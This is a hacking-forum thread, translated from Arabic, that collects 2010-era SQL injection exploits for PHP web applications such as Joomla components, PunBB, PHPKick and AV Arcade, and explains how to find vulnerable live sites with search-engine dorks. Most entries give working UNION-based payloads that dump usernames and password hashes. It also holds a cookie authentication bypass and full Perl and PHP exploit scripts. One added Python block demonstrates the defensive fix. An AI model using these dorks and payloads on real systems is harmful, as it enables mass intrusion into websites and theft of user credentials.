
√Kingdom of SQL Injection Vulnerabilities√ --Kingdom Of Sql Injection--
[align=center]Peace be upon you[/align]


::Kingdom of SQL Injection Vulnerabilities::
::Updated regularly, God willing::
-------------------------



Some people don't know how to exploit the vulnerabilities posted on the well-known security sites, and might not benefit from them if I post them here...
even though they know how to inject. So I will explain the first vulnerability I post.
Let's begin, with God's blessing.



PHP:
Nuked-Klan Module Partenaires NK 1.5 Blind Sql Injection
#The vulnerability title; it usually contains the name of the affected script and the vulnerability type#
2010-08-05
--The date the vulnerability was released--

$Now here is the vulnerability content$
####################################################################
.:. Author : Metropolis --name or handle of the vulnerability's author--
.:. Home : www.metropolis.fr.cr --the author's site--
.:. Script : Nuked-Klan Module Partenaires NK 1.5 --the affected script--
.:. Version : 1.5 --the script version--

.:. Download Script: http://www.nuked-klan.org/index.php?file=Download&op=description&dl_id=317 --the script's download link; it isn't important to you--
.:. Bug Type : Blind Sql Injection --the vulnerability type; here it is blind SQL injection--
.:. Dork : inurl:/modules/Partenaires/clic.php?id=
--The dork: copy and paste it into any search engine, and the results that come up are the affected sites--
####################################################################
Blind Sql Injection

SQL Error =>
--How to find the error--

/modules/Partenaires/clic.php?id=8'
--This is the link for finding the error--

www.site.com/modules/Partenaires/clic.php?id=8 [Blind]
--And this is the exploit. Say, for example, one of the affected sites comes up, such as:
www.xxx.com
It runs the script, of course; you append to its address the path from the exploit:
/modules/Partenaires/clic.php?id=
After the equals sign, put a value according to what the search engine shows you, and do the same with every site...

####################################################################

Now that was one example, with explanation; the coming vulnerabilities will be posted without explanation...
Please keep this thread for posting vulnerabilities only, with no replies.
Regards
Master vbspiders



 

[align=center]What is it you didn't understand, dear brother?
This thread is a shortcut for finding the scripts affected by SQL injection vulnerabilities.
Here I post the vulnerabilities of the affected scripts, which will make searching for affected sites easier for you.
That's all there is to this thread.
Please don't post other side replies.
This is the last warning.
Regards
[/align]
 
APT-WEBSHOP-SYSTEM modules.php SQL injection

PHP:
===============================================
APT-WEBSHOP-SYSTEM modules.php SQL injection
===============================================
 
  ____ ____ _____ ___   ____ ______   ____ ___   ___    _  __
  / __// __// ___// _ \ / __//_  __/  /  _// _ \ / _ |  / |/ /
 _\ \ / _/ / /__ / , _// _/   / /    _/ / / , _// __ | /    /
/___//___/ \___//_/|_|/___/  /_/____/___//_/|_|/_/ |_|/_/|_/ 
                               /___/                         
 
####################################################
# APT-WEBSHOP-SYSTEM modules.php SQL injection
####################################################
# Discovered by : secret
# Site          : http://swissfaking.net
# Dork          : powered by apt-webservice ;apt-webshop-system v3.0
# Vendor        : http://www.apt-ebusiness.com
 
# Exploit       : [site]/shop/modules.php?warp=artikel&group=x&seite=x&id=xxx(SQLINJECTION)
 
 
#######################################################################################
 
Joomla CamelcityDB 2.2 SQL Injection Vulnerability

PHP:
==============================================================
Joomla Component (com_camelcitydb2) SQL Injection Vulnerability
==============================================================
  
###########################
Title : Joomla Component (com_camelcitydb2) SQL Injection Vulnerability
Script : Joomla CamelcityDB 2.2
Date : 02/08/2010
Author : Amine_92
Tested : All version
Home : http://vbhacker.net
Dork : inurl:"option=com_camelcitydb2"
contact : amine92_16@hotmail.fr
########################### 
           
[ Vulnerable File ]
       
[path]/index.php?option=com_camelcitydb2&view=all&Itemid=15
  
[SQL]:
  
/index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11+from+jos_users--
  
############################################################## 
Thanks to : All Hacker Mu$lim & People of Gaza
 
WordPress NextGEN Smooth Gallery Blind SQL Injection Vulnerability

PHP:
#############################################################################################################
## WordPress NextGEN Smooth Gallery BLIND SQL injection                                            ##
## Author : kaMtiEz (kamzcrew@yahoo.com)                                   ##
## Homepage : http://www.indonesiancoder.com                                           ##
## Date : 03 August, 2010                                                          ##
#############################################################################################################
 
[ Software Information ]
 
[+] Download : http://downloads.wordpress.org/plugin/nextgen-smooth-gallery.1.2.zip
[+] version : 1.2 or lower maybe also affected
[+] Vulnerability : BLIND SQL
[+] Dork : "CiHuY"
[+] LOCATION : INDONESIA - JOGJA
 
#############################################################################################################
 
[ Vulnerable File ]
 
http://127.0.0.1/[kaMtiEz]/wp-content/plugins/nextgen-smooth-gallery/nggSmoothFrame.php?galleryID=[VALID ID][BLIND-SQL]
 
[ DEMO ]
 
http://www.site.com/wp-content/plugins/nextgen-smooth-gallery/nggSmoothFrame.php?galleryID=31[BLIND-SQL]
 
http://www.site.com/wp-content/plugins/nextgen-smooth-gallery/nggSmoothFrame.php?galleryID=34[BLIND-SQL]
 
http://www.site.com/dp2009/wp-content/plugins/nextgen-smooth-gallery/nggSmoothFrame.php?galleryID=2[BLIND-SQL]
 
[ FIX ]
 
dunno :">
 
 
#############################################################################################################
 
[ Thx TO ]
 
[+] INDONESIAN CODER TEAM MainHack MAGELANG CYBER ServerIsDown SurabayaHackerLink IndonesianHacker MC-CREW IH-CREW
[+] tukulesto,M3NW5,arianom,N4CK0,Jundab,d0ntcry,bobyhikaru,gonzhack,senot,Jack-,Hakz,pl4nkt0n
[+] Contrex,YadoY666,bumble_be,MarahMeraH,newbie_043,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1ck
[+] Coracore,Gh4mb4s,Jack-,vYcOd,ayy,otong,CS-31,yur4kh4,MISTERFRIBO,GENI212,anharku,isarock
 
 
[ NOTE ]
 
[+] WE ARE ONE UNITY, WE ARE A CODER FAMILY, AND WE ARE INDONESIAN CODER TEAM
[+] Menyambut kemerdekaan INDONESIA .. MERDEKA !!
[+] Selamat Menyambut datangnya bulan ramadhan :D
[+] sendiri di malam hari sambil merokok menikmati indahnya pagi ;)
 
[ QUOTE ]
 
[+] INDONESIANCODER still r0x
[+] nothing secure ..
 

darkman.dz

nabil987
Dear brother,
The brother above just explained the English to you.
It makes no sense that you don't understand this language yet want to learn, dear brother.
You have to learn at least some of its basics.
That is my advice to you.
--------------------------------------
Master vbspiders
Thank you for the nice initiative; the thread deserves to be pinned and rated.
I hope the group gets involved.
 

[align=center]Thanks for the clarification, and I have no objection if the brothers join me in posting vulnerabilities...
Regards
[/align]
 
PHP:
TTVideo 1.0 Joomla Component SQL Injection Vulnerability
Download link: http://www.toughtomato.com/resources/downloads/joomla-1.5/components/ttvideo/

Name              TTVideo
Vendor            http://www.toughtomato.com
Versions Affected 1.0
Author            Salvatore Fresta aka Drosophila
Website           http://www.salvatorefresta.net
Contact           salvatorefresta [at] gmail [dot] com
Date              2010-07-27

X. INDEX

I.    ABOUT THE APPLICATION
II.   DESCRIPTION
III.  ANALYSIS
IV.   SAMPLE CODE
V.    FIX

I. ABOUT THE APPLICATION
________________________

TTVideo is a Joomla! component that makes use of the popular video sharing site Vimeo to create a video library.

II. DESCRIPTION
_______________

A parameter in ttvideo.php is not properly sanitised before being used in a SQL query.

III. ANALYSIS
_____________

Summary:

 A) SQL Injection

A) SQL Injection
________________

The parameter cid passed to ttvideo.php when task is set to video is not properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. The following is the vulnerable code:

ttvideoController.php (line 40):

function video() {
    $cid = JRequest::getVar('cid', null, 'default');

ttvideo.php (line 188):

function getVideo($id) {
    $db = $this->getDBO();
    $db->setQuery("SELECT * from #__ttvideo WHERE id=$id");
    $video = $db->loadObject();
    if ($video === null)
        JError::raiseError(500, 'Video with ID: '.$id.' not found.');
    return $video;
}

IV. SAMPLE CODE
_______________

A) SQL Injection

http://site/path/index.php?option=com_ttvideo&task=video&cid=-1 UNION SELECT 1,2,3,4,5,6,7,8,CONCAT(username,0x3A,password),10,11,12,13,14,15,16,17 FROM jos_users

V. FIX
______

Use JRequest::getInt instead of JRequest::getVar
 
AV Arcade v3 Cookie SQL Injection Authentication Bypass

PHP:
:----------------------------------------------------------------------------:
: # Software      : AV Arcade v3   [PHP]                                     :
: # Site          : www.avscripts.net                                        :
: # Date          : 28/07/2010                                               :
: # Author        : saudi0hacker                                             :
: # Type          : Auth Bypass / Cookie                                     :
: # Greetz to     : pr.al7rbi : so busy : evil-ksa : Dr.dakota : v4-team.com :
:----------------------------------------------------------------------------:
 
[1] Go to the URL:
    http://www.xxxxx.net/index.php?task=login
 
[2] Apply these cookies:
 
    Javascript:document.cookie = "ava_username=admin;"
    Javascript:document.cookie = "ava_code=c4ca4238a0b923820dcc509a6f75849b 'or' 1=1;"
 
[3] Go to main Page:
 
[4] Enjoy
 
PunBB <= 1.3.4 and Pun_PM <= v1.2.6 Remote Blind SQL Injection Exploit

PHP:
#!/usr/bin/perl
# [0-Day] PunBB <= 1.3.* Package: Pun_PM <= v1.2.6 Remote Blind SQL Injection Exploit
# Author/s: Dante90, WaRWolFz Crew
# Created: 2009.07.30 after 0 days the bug was discovered.
# Crew Members: 4lasthor, Andryxxx, Cod3, Gho5t, HeRtZ, N.o.3.X, RingZero, s3rg3770, Shades Master, The:Paradox, V1R5, yeat
# Greetings To: _ nEmO _, XaDoS, Necrofiend, Lutor, vagabondo, hacku, yawn, The_Exploited, Shotokan-The Hacker, _mRkZ_,
#               Chuzz, init, plucky, SaRtE, Lupo
# Thanks For Testing: BlAcK HaT, l3d
# Web Site: www.warwolfz.org
# My Wagend (Dante90): dante90wwz.altervista.org
# Unit-X Project: www.unitx.net
# ----
# Why I've decided to publish this?
# Because in "Package: Pun_PM <= v1.2.9" the bug was fixed.
# ----
# DETAILS
# ./PunBB v1.3.*/extensions/pun_pm/functions.php
# LINES: 504 -> 526
#   function pun_pm_edit_message()
#   {
#       global $forum_db, $forum_user, $lang_pun_pm;
#
#       $errors = array();
#
#       // Verify input data
#       $query = array(
#           'SELECT'    => 'm.id as id, m.sender_id as sender_id, m.status as status, u.username as username, m.subject as subject, m.body as body',
#           'FROM'      => 'pun_pm_messages m',
#           'JOINS'     => array(
#               array(
#                   'LEFT JOIN'     => 'users AS u',
#                   'ON'            => '(u.id = m.receiver_id)'
#               ),
#           ),
#           'WHERE'     => 'm.id = '.$forum_db->escape($_GET['message_id']).' AND m.sender_id = '.$forum_user['id'].' AND m.deleted_by_sender = 0'
#       );
#
#       ($hook = get_hook('pun_pm_fn_edit_message_pre_validate_query')) ? eval($hook) : null;
#
#       $result = $forum_db->query_build($query) or error(__FILE__, __LINE__);
# ----
# GET http://127.0.0.1/WaRWolFz/misc.php?section=pun_pm&pmpage=write&message_id=-1'
# Error - PunBB
# An error was encountered
# The error occurred on line 525 in ./WaRWolFz/extensions/pun_pm/functions.php
# Database reported: Errore di sintassi nella query SQL vicino a '\ AND m.sender_id = 2 AND m.deleted_by_sender = 0' linea 1 (Errno: 1064).
 
use strict;
use warnings;
 
use LWP::UserAgent;
use HTTP::Cookies;           # module name was masked by the forum's word filter; restored here
use HTTP::Request::Common;
use Time::HiRes;
use IO::Socket;
 
my ($UserName,$PassWord,$ID) = @ARGV;
if (@ARGV < 3) {
    &usage();
    exit();
}
 
my $Message = "";
my $Hash = "";
my ($Time,$Time_Start,$Time_End,$Response);
my ($Start,$End);
my @chars = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102); # ASCII codes of 0-9 and a-f
my $Host = "http://www.victime_site.org/path/"; #Insert Victime Web Site Link
my $Method = HTTP::Request->new(GET => $Host);
my $Cookies = new HTTP::Cookies;   # cookie jar; variable name restored after the forum filter masked it
my $HTTP = new LWP::UserAgent(
            agent => 'Mozilla/5.0',
            max_redirect => 0,
            cookie_jar => $Cookies,
        ) or die $!;
my $Referrer = "http://www.warwolfz.org/";
my $DefaultTime = request($Referrer);
 
sub request {
    $Referrer = $_[0];
    $Method->referrer($Referrer);
    $Start = Time::HiRes::time();
    $Response = $HTTP->request($Method);
    $Response->is_success() or die "$Host : ", $Response->message,"\n";
    $End = Time::HiRes::time();
    $Time = $End - $Start;
    return $Time;
}
 
sub Blind_SQL_Jnjection {
    my ($dec,$hex) = @_;
    return "./misc.php?section=pun_pm&pmpage=write&message_id=-1 OR 1!=(SELECT IF((ASCII(SUBSTRING(`password`,${dec},1))=${hex}),benchmark(200000000,CHAR(0)),0) FROM `users` WHERE `id`=${ID})--";
}
 
sub Clear() {
    my $launch = $^O eq 'MSWin32' ? 'cls' : 'clear';
    return system($launch);
}
 
sub Login() {
    # the optional proxy is the 4th argument (index 3); it belongs on the user agent, not on the cookie jar
    if (defined $ARGV[3] && $ARGV[3] =~ /^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}?$/) {
        $HTTP->proxy(['http', 'ftp'], 'http://'.$ARGV[3]);
    }
    my $Get = $HTTP->get($Host.'login.php');
    my $csrf_token = "";
    if ($Get->content =~ /type="hidden" name="csrf_token" value="([a-f0-9]{1,40})/i) { #ByPassing csrf_token hidden input
        $csrf_token = $1;
    }
    my $Login = $HTTP->post($Host.'login.php',
                [
                    form_sent       => '1',
                    redirect_url    => $Host.'login.php',
                    csrf_token      => $csrf_token,
                    req_username    => $UserName,
                    req_password    => $PassWord,
                    save_pass       => '1',
                    login => 'Login',
                ]) || die $!;
 
    if ($Login->content =~ /Verrai trasferito automaticamente ad una nuova pagina in 1 secondo/i) { #English Language: You should automatically be forwarded to a new page in 1 second.
        return 1;
    } else {
        return 0;
    }
}
 
sub usage {
    Clear();
    {
        print " \n [0-Day] PunBB <= 1.3.4 Package: Pun_PM <= v1.2.6 Remote Blind SQL Injection Exploit\n";
        print " ------------------------------------------------------ \n";
        print " * USAGE:                                             *\n";
        print " * cd [Local Disk]:\\[Directory Of Exploit]\\           *\n";
        print " * perl name_exploit.pl [username] [password] [id]    *\n";
        print " * [proxy] is optional (ex: 151.57.4.97:8080)         *\n";
        print " ------------------------------------------------------ \n";
        print " *         Powered By Dante90, WaRWolFz Crew          *\n";
        print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
        print " ------------------------------------------------------ \n";
    };
    exit;
}
 
sub Refresh {   # the original sub name was masked by the forum's word filter; "Refresh" is a substitute
    Clear();
    {
        print " \n [0-Day] PunBB <= 1.3.4 Package: Pun_PM <= v1.2.6 Remote Blind SQL Injection Exploit\n";
        print " ------------------------------------------------------ \n";
        print " * USAGE:                                             *\n";
        print " * cd [Local Disk]:\\[Directory Of Exploit]\\           *\n";
        print " * perl name_exploit.pl [username] [password] [id]    *\n";
        print " * [proxy] is optional (ex: 151.57.4.97:8080)         *\n";
        print " ------------------------------------------------------ \n";
        print " *         Powered By Dante90, WaRWolFz Crew          *\n";
        print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
        print " ------------------------------------------------------ \n";
    };
    print $_[0] ."\n";
    print " * Victime Site: " . $_[1] . "\n";
    print " * Default Time: " . $_[2] . " seconds\n";
    print " * BruteForcing Hash: " . chr($chars[$_[3]]) . "\n";
    print " * BruteForcing N Char Hash: " . $_[6] . "\n";
    print " * SQL Time: " . $_[5] . " seconds\n";
    print " * Hash: " . $_[4] . "\n";
}
 
sub Main(){
    if (Login() == 1) {
        $Message = " * Logged in as: ".$UserName;
    } elsif (Login() == 0) {
        $Message = " * Login Failed.";
        Refresh($Message, $Host, $DefaultTime, "0", $Hash, $Time, "1");
        print " * Exploit Failed                                     *\n";
        print " ------------------------------------------------------ \n";
        exit;
    }
    for (my $I=1; $I<=40; $I++) { #N Hash characters
        for (my $J=0; $J<=15; $J++) { #0 -> F
            $Time_Start = time();
            my $Get1 = $HTTP->get($Host.Blind_SQL_Jnjection($I,$chars[$J]));
            $Time_End = time();
            $Time = request($Referrer);
            Refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I);
            if ($Time_End - $Time_Start > 6) {
                $Time = request($Referrer);
                Refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I);
                if ($Time_End - $Time_Start > 6) {
                    syswrite(STDOUT,chr($chars[$J]));
                    $Hash .= chr($chars[$J]);
                    $Time = request($Referrer);
                    Refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I);
                    last;
                }
            }
        }
        if ($I == 1 && length $Hash < 1 && !$Hash) {
            print " * Exploit Failed                                     *\n";
            print " ------------------------------------------------------ \n";
            exit;
        }
        if ($I == 40) {
            print " * Exploit Successfully Executed                      *\n";
            print " ------------------------------------------------------\n ";
            system("pause");
        }
    }
}
 
Main();
 
#WaRWolFz Crew
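Two of the advisories in this thread show the same root cause from different angles: TTVideo interpolates `$id` straight into `WHERE id=$id` (its fix is `JRequest::getInt`), and Pun_PM runs `message_id` through `$forum_db->escape()` but still drops it, unquoted, into `m.id = ...`, so a payload without quote characters is not altered at all. The following is an added example, not code from the page or from either project: a Python model over sqlite3 of the escaped-but-unquoted pattern beside an integer cast (what `getInt` amounts to) and a bound parameter; the table and hash values are constructed.

```python
import re
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the users table the advisories above read from."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        (1, "admin", "5f4dcc3b5aa765d61d8327deb882cf99"),  # constructed sample values
        (2, "alice", "098f6bcd4621d373cade4e832627b4f6"),
    ])
    return conn


def escape(value):
    """Quote-escaping in the spirit of $forum_db->escape(): it only neutralises quote characters."""
    return value.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def lookup_escaped(conn, message_id):
    """Pun_PM's pattern: the escaped value is dropped into an UNQUOTED numeric comparison.
    A payload with no quote characters ('-1 OR 1=1') passes escape() unchanged."""
    sql = "SELECT id, username FROM users WHERE id = " + escape(message_id)
    return conn.execute(sql).fetchall()


def php_intval(value):
    """Model of PHP's (int) cast (JRequest::getInt likewise reduces the value to an integer):
    leading integer, else 0."""
    m = re.match(r"\s*([+-]?\d+)", value)
    return int(m.group(1)) if m else 0


def lookup_int(conn, message_id):
    """TTVideo's fix: the value is an integer before it reaches SQL; trailing SQL is discarded."""
    return conn.execute("SELECT id, username FROM users WHERE id = ?",
                        (php_intval(message_id),)).fetchall()


def lookup_param(conn, message_id):
    """Bound parameter: the whole string is one literal and is never parsed as SQL."""
    return conn.execute("SELECT id, username FROM users WHERE id = ?",
                        (message_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    payload = "-1 OR 1=1"
    print("escape() only :", lookup_escaped(db, payload))   # every row comes back
    print("int cast      :", lookup_int(db, payload))       # no row
    print("bound param   :", lookup_param(db, payload))     # no row
```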
 
Freeway CMS 1.4.3.210 SQL Injection Vulnerability

PHP:
-----------------------------------------------------------------------------------------
Freeway CMS 1.4.3.210 SQL Injection Vulnerability
-----------------------------------------------------------------------------------------
 
[+]Title              Freeway CMS 1.4.3.210 SQL Injection Vulnerability
[+]Author          **RoAd_KiLlEr**
[+]Contact        RoAd_KiLlEr[at]Khg-Crew[dot]Ws
[+]Tested on     Win Xp Sp 2/3
---------------------------------------------------------------------------
[~] Founded by **RoAd_KiLlEr**
[~] Team: Albanian Hacking Crew
[~] Contact: RoAd_KiLlEr[at]Khg-Crew[dot]Ws
[~] Home: http://inj3ct0r.com
[~] Vendor: http://www.openfreeway.org
[~] Download: http://internode.dl.sourceforge.net/sourceforge/freeway-ecom/freeway_1_3_4_210.tar.gz
[~] Version:1.4.3.210
[~] Price : Free
==========ExPl0iT3d by **RoAd_KiLlEr**==========
[+] Description: Freeway is the most advanced Open Source eCommerce platform and includes an array of features not found in extremely expensive commercial systems. Without having to purchase a commercial system and then paying a developer to build custom installation, Freeway does most of what you need out of the box. For example, instead of getting dragged into purchasing an overpriced products based system and having a developer struggle for weeks and eventually fail to force products sales into event sales, Freeway already support events AND services AND subscriptions.
==========================================
 
[+] Dork: No DoRks For Script Kiddies
 
==========================================
 
[ I ].  SQL Vulnerability
=+=+=+=+=+=+=+=+=+
 
[P0C]:  http://127.0.0.1/path/index.php?ecPath=[SQL Injection]
 
[L!v3 D3m0]: http://www.site.com/register/index.php?ecPath='3
 
And we Got:  1054 - Unknown column 'e.events_status' in 'where clause'
 
select events_id, events_image from events where (e.events_status=1 or ( e.events_status=2 and e.sessions_start_date>=curdate()) or (e.events_status>=3 and e.sessions_end_date>=curdate())) and date_format(e.events_date_available,'%Y-%m-%d')<=curdate() order by events_date_added desc limit 4
 
Now you will be doing the Rest :P. Good Luck
 
===========================================================================================
[!] Albanian Hacking Crew          
===========================================================================================
[!] **RoAd_KiLlEr**  
===========================================================================================
[!] MaiL: sukihack[at]gmail[dot]com
===========================================================================================
[!] Greetz To : Ton![w]indowS | X-n3t | b4cKd00r ~ | DarKHackeR. | The|DennY` | EaglE EyE | Lekosta | KHG | THE_1NV1S1BL3 & All Albanian/Kosova Hackers
===========================================================================================
[!] Spec Th4nks:  r0073r  | indoushka from Dz-Ghost Team  | MaFFiTeRRoR | All  Inj3ct0r 31337 Members | And All My Friendz
===========================================================================================
[!] Red n'black i dress eagle on my chest
It's good to be an ALBANIAN
Keep my head up high for that flag I die
Im proud to be an ALBANIAN
===========================================================================================
 
APBoard v2.1.0 ( board.php?id=) SQL Injection Vulnerability

PHP:
#############################################################################################################
## APBoard 2.1.0  / board.php?id= SQL Injection                                           ##
## Author         : secret - mohammed.atta@hotmail.com                                   ##
## Homepage       : http://swissfaking.net/                                             ##
## Date           : 05 August, 2010                                                    ##
#############################################################################################################
  ____ ____ _____ ___   ____ ______   ____ ___   ___    _  __
  / __// __// ___// _ \ / __//_  __/  /  _// _ \ / _ |  / |/ /
 _\ \ / _/ / /__ / , _// _/   / /    _/ / / , _// __ | /    /
/___//___/ \___//_/|_|/___/  /_/____/___//_/|_|/_/ |_|/_/|_/ 
                               /___/                          
   
####################################################
# APBoard 2.1.0  / board.php?id= SQL Injection
####################################################
# Discovered by : secret
# Site          : http://swissfaking.net/
# Dork          : APBoard 2.1.0 © 2003-2010 APP - Another PHP Program
# Vendor        : http://www.php-programs.de/
# Version       : 2.1.0 and earlier
# Exploit       : http://www.yoursite.de/board/board.php?id=X[SQL INJECTION]
# Tested on     : Microsoft OS
   
e.g. http://server/board/board.php?id=6[get union columns&USERS'] (-sqlinjection)
    
########################################################################################
   
#note : IRAN owns - mohammed.atta@hotmail.com
 
sX-Shop Multiple SQL Injection Vulnerabilities

PHP:
########################################################################################
 
sX-Shop SQL Injection Vulnerabilities
 
########################################################################################
 
Author : CoBRa_21
Author Web Page :http://ipbul.org
Dork : "powered by sX-Shop"
Script Page : http://www.source-worx.de/
 
########################################################################################
  
Sql Injection :
 
http://localhost/[path]/index.php?product=_513' (Sql)
http://localhost/[path]/question.php?id=-513 union select version()  (Sql)
http://localhost/[path]/tell_a_friend.php?id=-500 union select version()  (Sql)
 
########################################################################################
Thanks cyber-warrior.org  &  e-banka.org & AKINCILAR
########################################################################################
 
PHPKick v0.8 statistics.php SQL Injection Exploit

PHP:
# Exploit Title: PHPKick v0.8 statistics.php SQL Injection
# Date: August 8th, 2010
# Time: 03:45am ;(
# Author: garwga
# Version: 0.8
# Google dork : "© 2004 PHPKick.de Version 0.8"
# Category:  webapps/0day
# Code: see below
  
<?php
    echo"\n\n";
    echo"|=================PHPKick v0.8 statistics.php SQL Injection==================|\n";
    echo"|                                                                            |\n";
    echo"|Syntax: php ".$_SERVER['argv'][0]." [host] [path]                                       |\n";
    echo"|                                                                            |\n";
    echo"|Example: php ".$_SERVER['argv'][0]." http://www.domain.com /path/                       |\n";
    echo"|                                                                            |\n";
  
    echo"|Notes:This exploit works regardless of the PHP security settings            |\n";
    echo"|      (magic_quotes, register_globals).This exploit is only for educational |\n";
    echo"|      use, use it on your own risk! Exploiting scripts without permission of|\n";
    echo"|      the owner of the webspace is illegal!                                 |\n";
    echo"|      I'm not responsible for any resulting damage                          |\n";
    echo"|                                                                            |\n";
    echo"|Google Dork: \"© 2004 PHPKick.de Version 0.8\"                                |\n";
    echo"|                                                                            |\n";
    echo"|Exploit found by garwga (ICQ#:453-144-667)                                  |\n";
    echo"|============================================================================|\n\n\n";
  
  
if($_SERVER['argv'][1] && $_SERVER['argv'][2]){
    $host=$_SERVER['argv'][1];
    $path=$_SERVER['argv'][2];
    $spos=strpos($host, "http://");
    if(!is_int($spos)&&($spos==0)){
       $host="http://$host";
      }
    if($host!="http://localhost"){   // `!$host==...` negated the string, not the comparison
       $spos=strpos($host, "http://www.");
       if (!is_int($spos)&&($spos==0)){
          $host="http://www.$host";
          }
      }
    $exploit="statistics.php?action=overview&gameday=-32%20union%20select%201,2,3,4,0x2720756e696f6e2073656c65637420312c322c636f6e636174286e69636b2c273a272c70617373776f7274292c342c352c362c372066726f6d206b69636b5f757365722077686572652069643d2231222d2d2066,6,7,8--%20f";
    echo"exploiting...\n";
    $source=file_get_contents($host.$path.$exploit);
    $username=GetBetween($source," :<br>",":");
    echo "username: $username\n";
    $hash=GetBetween($source,"<br>$username:","</td>");
    echo"hash: $hash\n";
    }
else{
    echo"\n\n";
    echo"|=================PHPKick v0.8 statistics.php SQL Injection==================|\n";
    echo"|                                                                            |\n";
    echo"|Syntax: php ".$_SERVER['argv'][0]." [host] [path]                                       |\n";
    echo"|                                                                            |\n";
    echo"|Example: php ".$_SERVER['argv'][0]." http://www.domain.com /path/                       |\n";
    echo"|                                                                            |\n";
  
    echo"|Notes:This exploit works regardless of the PHP security settings            |\n";
    echo"|      (magic_quotes, register_globals).This exploit is only for educational |\n";
    echo"|      use, use it on your own risk! Exploiting scripts without permission of|\n";
    echo"|      the owner of the webspace is illegal!                                 |\n";
    echo"|      I'm not responsible for any resulting damage                          |\n";
    echo"|                                                                            |\n";
    echo"|Google Dork: \"© 2004 PHPKick.de Version 0.8\"                                |\n";
    echo"|                                                                            |\n";
    echo"|Exploit found by garwga (ICQ#:453-144-667)                                  |\n";
    echo"|============================================================================|\n";
}
// return the text between the first occurrence of $start and the next $end,
// or '' when $start is not present in $content
function GetBetween($content,$start,$end){
    $r = explode($start, $content);
    if (isset($r[1])){
        $r = explode($end, $r[1]);
        return $r[0];
    }
    return '';
}
?>
 
Tycoon CMS Record Script SQL Injection Vulnerability

PHP:
% Tycoon(CMS) Record Script Sql vulnerability
 
-------------------------------------------------------------------------------
0                             | |              | |                      | |  TM
1   _______  _ __   ___ ______| |__   __ _  ___| | _____ _ __ _ __   ___| |_
0  |_  / _ \| '_ \ / _ \______| '_ \ / _` |/ __| |/ / _ \ '__| '_ \ / _ \ __|
1   / / (_) | | | |  __/      | | | | (_| | (__|   <  __/ | _| | | |  __/ |_
0  /___\___/|_| |_|\___|      |_| |_|\__,_|\___|_|\_\___|_|(_)_| |_|\___|\__|
1                         0xPrivate 0xSecurity 0xTeam
0       ++++++++++++++++++++++++++++++++++++++++++++++++++++
1                      A Place Of 0days
------------------------------------------------------------------------------
 
^Exploit Title  : Tycoon(CMS) Record Script Sql vulnerability
^Date       : 7/8/2010
^Vendor Site    : http://www.tycoon.co.kr
^MOD Version    : 1.0.9
^Author     : Silic0n (science_media017[At]yahoo.com)
^category:  : webapps/0day
^Dork       : inurl:index.php?mode=game_player
 
------------------------------------------------------------------------------
Special Thanks To Jackh4x0r , Gaurav_raj420 , Mr 52 (7) , Dalsim , Zetra , haZl0oh , root4o ,
 Dark , XG3N , Belma(sweety), messsy , Thor ,abronsius ,Nova ,
 ConsoleFx , Exi , Beenu , R4cal , jaya ,entr0py,[]0iZy5 & All my friends .
 
My Friends' Sites : www.igniteds.net , www.anti-intruders.org (Will Be Up Very Soon) , www.root-market.com ,www.Darkode.com ,r00tDefaced.com
 
----------------------------------->Exploit<----------------------------------
 
0x1: Go to http://{localhost}/record/index.php?mode=game_player&type=0&year=2010&game_id=-14 UNion Select 1,2,@@version
 
Version : (4.0.22-log)
 
------------------------------------------------------------------------------
 
Joomla Component com_neorecruit 1.4 SQL Injection Vulnerability

PHP:
     )   )            )                     (   (         (   (    (       )     )
  ( /(( /( (       ( /(  (       (    (     )\ ))\ )      )\ ))\ ) )\ ) ( /(  ( /(
  )\())\()))\ )    )\()) )\      )\   )\   (()/(()/(  (  (()/(()/((()/( )\()) )\())
 ((_)((_)\(()/(   ((_)((((_)(  (((_)(((_)(  /(_))(_)) )\  /(_))(_))/(_))(_)\|((_)\
__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_))  _((_)_ ((_)
\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \|   \| __| _ \ |  |_ _|| \| | |/ /
 \ V / (_) || (_ |\ V / / _ \  | (__ / _ \ |   /| |) | _||   / |__ | | | .` | ' < 
  |_| \___/  \___| |_| /_/ \_\  \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\
                                        .WEB.ID
-----------------------------------------------------------------------
 Joomla Component com_neorecruit 1.4 (id) SQL Injection Vulnerability
-----------------------------------------------------------------------
Author      : v3n0m
Site        : http://yogyacarderlink.web.id/
Date        : August, 07-2010
Location    : Jakarta, Indonesia
Time Zone   : GMT +7:00
----------------------------------------------------------------
 
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Application : NeoRecruit
Version     : 1.4 (lower versions may also be affected)
Vendor      : http://www.neojoomla.com/
Price       : 54,90 €
Google Dork : inurl:com_neorecruit
----------------------------------------------------------------
 
Xploit:
~~~~~~~
 
-9999+union+all+select+1,group_concat(username,char(58),password)v3n0m,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users--
 
Poc:
~~~~~~~
 
http://127.0.0.1/[path]/index.php?option=com_neorecruit&task=offer_view&id=[SQLi]
 
----------------------------------------------------------------
 
WWW.YOGYACARDERLINK.WEB.ID | v3n0m666[at]live[dot]com
 
---------------------------[EOF]--------------------------------
